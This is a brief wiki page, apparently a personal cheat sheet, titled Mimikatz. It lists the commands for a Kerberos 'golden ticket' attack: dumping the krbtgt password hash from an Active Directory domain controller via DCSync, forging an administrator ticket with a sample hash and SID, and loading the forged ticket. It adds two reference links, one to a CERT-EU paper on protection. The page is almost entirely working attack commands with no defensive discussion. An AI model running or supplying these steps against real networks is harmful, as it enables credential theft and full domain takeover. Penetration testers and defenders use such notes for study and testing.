Mimikatz

From WikiWiki
Revision as of 15:42, 16 March 2017 by Mendel (talk | contribs) (Created page with "= golden ticket = <syntaxhighlight lang="powershell"> #get krbtgt password hash .\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit mim...")
(change visibility) (diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

golden ticket

#get krbtgt password hash
.\Mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:contoso.int /user:krbtgt exit

mimikatz # kerberos::golden /admin:adminuser /domain:contoso.int /sid:S-1-5-21-0123456789-012345678-0234567890-1112 /krbt
gt:8dd38658f31da2b60103a2856d7fd42a /ticket:myticket.kiribi

kerberos::tgt ticket:myadmin-golden.kiribi


https://adsecurity.org/?page_id=1821

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf